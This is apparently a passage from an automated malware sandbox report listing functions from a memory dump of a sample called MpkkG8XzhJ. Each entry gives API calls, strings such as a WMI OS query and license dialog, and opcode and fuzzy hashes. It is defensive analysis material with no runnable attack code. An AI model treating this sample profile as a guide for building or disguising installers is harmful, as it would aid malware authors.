    • Opcode Fuzzy Hash: cf08668bbbebc652dc05f99108bf70859c0f99c3daa78516f6f3eb84f144d9f9
    • Instruction Fuzzy Hash: 2151DF715093D58BC712CF28C184AAFBFE4AF9A714F4909ADE4D95B243C230DB4ACB52
    Function 000C13F6 Relevance: .1, Instructions: 141COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0c3013e1957c154e33c20702ce1410c4b68ecc9ff320e0c1c9d48fa3d56d6270
    • Instruction ID: 46733e369226100f937e043affd348321bec204897d37963e35900f1c3cab754
    • Opcode Fuzzy Hash: 0c3013e1957c154e33c20702ce1410c4b68ecc9ff320e0c1c9d48fa3d56d6270
    • Instruction Fuzzy Hash: 5351EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3301DB30E9598B96
    Function 000C5001 Relevance: .1, Instructions: 112COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction ID: 9a8da7ca8c9f4681b769e38159cbc67393bac2eb997b0bc558b6711696da708f
    • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction Fuzzy Hash: B731FEB5604B0A8FCB14DF28CC516AEBBE0EB95301F244A2DE896C3742C775E949CF91
    Function 000CD872 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000CD877
      • Part of subcall function 000CC4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000CC5DB
    • _wcslen.LIBCMT ref: 000CDB3D
    • _wcslen.LIBCMT ref: 000CDB46
    • SetWindowTextW.USER32(?,?), ref: 000CDBA4
    • _wcslen.LIBCMT ref: 000CDBE6
    • _wcsrchr.LIBVCRUNTIME ref: 000CDD2E
    • GetDlgItem.USER32(?,00000066), ref: 000CDD69
    • SetWindowTextW.USER32(00000000,?), ref: 000CDD79
    • SendMessageW.USER32(00000000,00000143,00000000,0010389A), ref: 000CDD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000CDDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: d49e7426c0aa732882008ea1e00d0f907ba5eb6478a96d761b89843477794c8b
    • Instruction ID: 8a449e4414f77db7316fb44f570eae0f5cda4644d22275a33bdf9b76bec06433
    • Opcode Fuzzy Hash: d49e7426c0aa732882008ea1e00d0f907ba5eb6478a96d761b89843477794c8b
    • Instruction Fuzzy Hash: 82E15F72900258AADB24DBA4DD85FEE73BCEB05310F5484BAF609E7151EB749E84CF60
    Function 000BF608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 000BF62E
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
      • Part of subcall function 000C30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000F3070,?,000BEC48,00000000,?,00000050,000F3070), ref: 000C3102
    • _strlen.LIBCMT ref: 000BF64F
    • SetDlgItemTextW.USER32(?,000F0274,?), ref: 000BF6AF
    • GetWindowRect.USER32(?,?), ref: 000BF6E9
    • GetClientRect.USER32(?,?), ref: 000BF6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 000BF795
    • GetWindowRect.USER32(?,?), ref: 000BF7C2
    • SetWindowTextW.USER32(?,?), ref: 000BF7FB
    • GetSystemMetrics.USER32(00000008), ref: 000BF803
    • GetWindow.USER32(?,00000005), ref: 000BF80E
    • GetWindowRect.USER32(00000000,?), ref: 000BF83B
    • GetWindow.USER32(00000000,00000002), ref: 000BF8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 0ebc2c48b00ca946d2258f938987f4af067af5347cc8c394f2b44218417fba9e
    • Instruction ID: ee527a17f367a5a07d77a47ed2cc6d8c43734a51cc5c19e9e039a60075ccf360
    • Opcode Fuzzy Hash: 0ebc2c48b00ca946d2258f938987f4af067af5347cc8c394f2b44218417fba9e
    • Instruction Fuzzy Hash: 4481A172208301AFD715DF68CD89BAFBBE9EBC8704F04492DFA84D7251D670E8098B52
    Function 000DDCD2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 000DDD16
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8CE
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8E0
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD8F2
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD904
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD916
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD928
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD93A
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD94C
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD95E
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD970
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD982
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD994
      • Part of subcall function 000DD8B1: _free.LIBCMT ref: 000DD9A6
    • _free.LIBCMT ref: 000DDD0B
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DDD2D
    • _free.LIBCMT ref: 000DDD42
    • _free.LIBCMT ref: 000DDD4D
    • _free.LIBCMT ref: 000DDD6F
    • _free.LIBCMT ref: 000DDD82
    • _free.LIBCMT ref: 000DDD90
    • _free.LIBCMT ref: 000DDD9B
    • _free.LIBCMT ref: 000DDDD3
    • _free.LIBCMT ref: 000DDDDA
    • _free.LIBCMT ref: 000DDDF7
    • _free.LIBCMT ref: 000DDE0F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: ca6eb36eb09c994bd824ddb8c2f72728be8f721a436c1d21e4a322c3eef5aa8b
    • Instruction ID: 876a12d9e7d148449e28049962c3a3e4f7c1589809653fadf27ff9a98248ecf8
    • Opcode Fuzzy Hash: ca6eb36eb09c994bd824ddb8c2f72728be8f721a436c1d21e4a322c3eef5aa8b
    • Instruction Fuzzy Hash: 80311831A00305DFEF61AA78D849B96B3EAFF11311F14482BF45996392DA75EC44CA36
    Function 000CA6C1 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000CA6E6
    • _wcslen.LIBCMT ref: 000CA786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 000CA795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000CA7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000CA7DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 898ab5f2ae5dc7004fef789e39ce6f88a9b3f684d4bfc16741479221420ff388
    • Instruction ID: 56d511d36d24bae610c47540ebb4876b308c030745b259cf2b36c2f2911cb621
    • Opcode Fuzzy Hash: 898ab5f2ae5dc7004fef789e39ce6f88a9b3f684d4bfc16741479221420ff388
    • Instruction Fuzzy Hash: D53177322087457FE724AB209C46FAF77A8AF42724F14051EF500AA2D2FF64990883A6
    Function 000CE7DE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
    Download Yara Rule
    APIs
    • GetWindow.USER32(?,00000005), ref: 000CE801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 000CE82D
      • Part of subcall function 000C3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,000BD523,00000000,.exe,?,?,00000800,?,?,?,000C9E4C), ref: 000C331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 000CE849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000CE860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 000CE874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000CE89D
    • DeleteObject.GDI32(00000000), ref: 000CE8A4
    • GetWindow.USER32(00000000,00000002), ref: 000CE8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 9db215009f99ff519574117debc6ff04cee75f02a1d15a26e1df8f130ddcb1d6
    • Instruction ID: a2c7fe8b9aa0536f4690a52ea7076061f5d1ea0b02ee9c267e7e7f6a21c5e3d0
    • Opcode Fuzzy Hash: 9db215009f99ff519574117debc6ff04cee75f02a1d15a26e1df8f130ddcb1d6
    • Instruction Fuzzy Hash: 24110632644B50BBE3216B70DC4AFEF3A9DAF95710F008039FA45A50D2DF648A4A86B5
    Function 000DA411 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 000DA425
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DA431
    • _free.LIBCMT ref: 000DA43C
    • _free.LIBCMT ref: 000DA447
    • _free.LIBCMT ref: 000DA452
    • _free.LIBCMT ref: 000DA45D
    • _free.LIBCMT ref: 000DA468
    • _free.LIBCMT ref: 000DA473
    • _free.LIBCMT ref: 000DA47E
    • _free.LIBCMT ref: 000DA48C
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 8b793f7dc0c509f60d545053a980b068ef271c33cdc2f9b2b1fff3862dd085e6
    • Instruction ID: 3b690d2124e851344e1b3e9f3384464e08a96eb8a789bb997ddb65dfc69a8578
    • Opcode Fuzzy Hash: 8b793f7dc0c509f60d545053a980b068ef271c33cdc2f9b2b1fff3862dd085e6
    • Instruction Fuzzy Hash: 8911E676A00208FFCB01EF54C856CD93BA5EF15351B0584A2FA1C8F273DA31EE519BA2
    Function 000D3FB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: 203337f4dd385372b22c26f0ce73e37c5da74cedc4a2f7affcb552f5da94c5ab
    • Instruction ID: 47aa0fb0a2b0bd0bb5ce3f84dd07a2f8d64376fb0bed44baf06b65d25766dfa5
    • Opcode Fuzzy Hash: 203337f4dd385372b22c26f0ce73e37c5da74cedc4a2f7affcb552f5da94c5ab
    • Instruction Fuzzy Hash: 6DB13571800309EFCF29EFA8D9819AEBBB5BF14310B54416BF9156B312D731DA51CBA2
    Function 000BC3F7 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210comCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000BC3FC
    • CoCreateInstance.COMBASE(000E68A0,00000000,00000001,000E67D0,?), ref: 000BC41E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-3505469590
    • Opcode ID: a140f6754792127611db49691b8f7343d3a5baf4edba23aae9a4e2360355b50d
    • Instruction ID: dca9d503c7d23aeb8b6b608a54471dc5ea2223d6b53cf2ceffe81c1d42500cfd
    • Opcode Fuzzy Hash: a140f6754792127611db49691b8f7343d3a5baf4edba23aae9a4e2360355b50d
    • Instruction Fuzzy Hash: 16714A71A00619AFEB14DFA5C894EAEB7B9EF48710B14015DE512FB2A1CB34AD41CB60
    Function 000CC7A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CC7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 000CC817
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000CC830
    • SetWindowTextW.USER32(?,?), ref: 000CC841
    • GetDlgItem.USER32(?,00000065), ref: 000CC84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000CC85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000CC874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: b61d054c2737956883441db64e44be467f3e3e4c88bb6c2441877b849911dc0e
    • Instruction ID: 0c82f59070540050659e02fdd76cac55aea6eb9298e90663d4837604d62f6b1f
    • Opcode Fuzzy Hash: b61d054c2737956883441db64e44be467f3e3e4c88bb6c2441877b849911dc0e
    • Instruction Fuzzy Hash: 9F21D632244604BBE7165B65EE49FBF3AADEB46B81F00801DF605E15A1CB529C419A71
    Function 000BB5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000BB5E2
      • Part of subcall function 000C26F1: GetSystemTime.KERNEL32(?), ref: 000C26FF
      • Part of subcall function 000C26F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 000C270D
      • Part of subcall function 000C269A: __aulldiv.LIBCMT ref: 000C26A3
    • __aulldiv.LIBCMT ref: 000BB60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 000BB615
    • _swprintf.LIBCMT ref: 000BB640
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • _wcslen.LIBCMT ref: 000BB64A
    • _swprintf.LIBCMT ref: 000BB6A0
    • _wcslen.LIBCMT ref: 000BB6AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
    • String ID: %u.%03u
    • API String ID: 2956649372-1114938957
    • Opcode ID: d3bf9581fa2a0fac0cb60a79d8d1deb8c3c5f9a77b56f996273fc2d24a508d26
    • Instruction ID: 343801bb8d1a2f878031786e6db30a80a07c98ed159fcf66cc0ce625f468608e
    • Opcode Fuzzy Hash: d3bf9581fa2a0fac0cb60a79d8d1deb8c3c5f9a77b56f996273fc2d24a508d26
    • Instruction Fuzzy Hash: 53217172A043406FD614EF65DC85EDF77ECEB94700F00492AB545E7252DB74DA0887B6
    Function 000CBC1B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
    Download Yara Rule
    APIs
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC2F
    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000CBC40
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000CBC4E
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC5C
    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000CBC77
    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 000CBC9E
    • _swprintf.LIBCMT ref: 000CBCC4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
    • String ID: %s %s
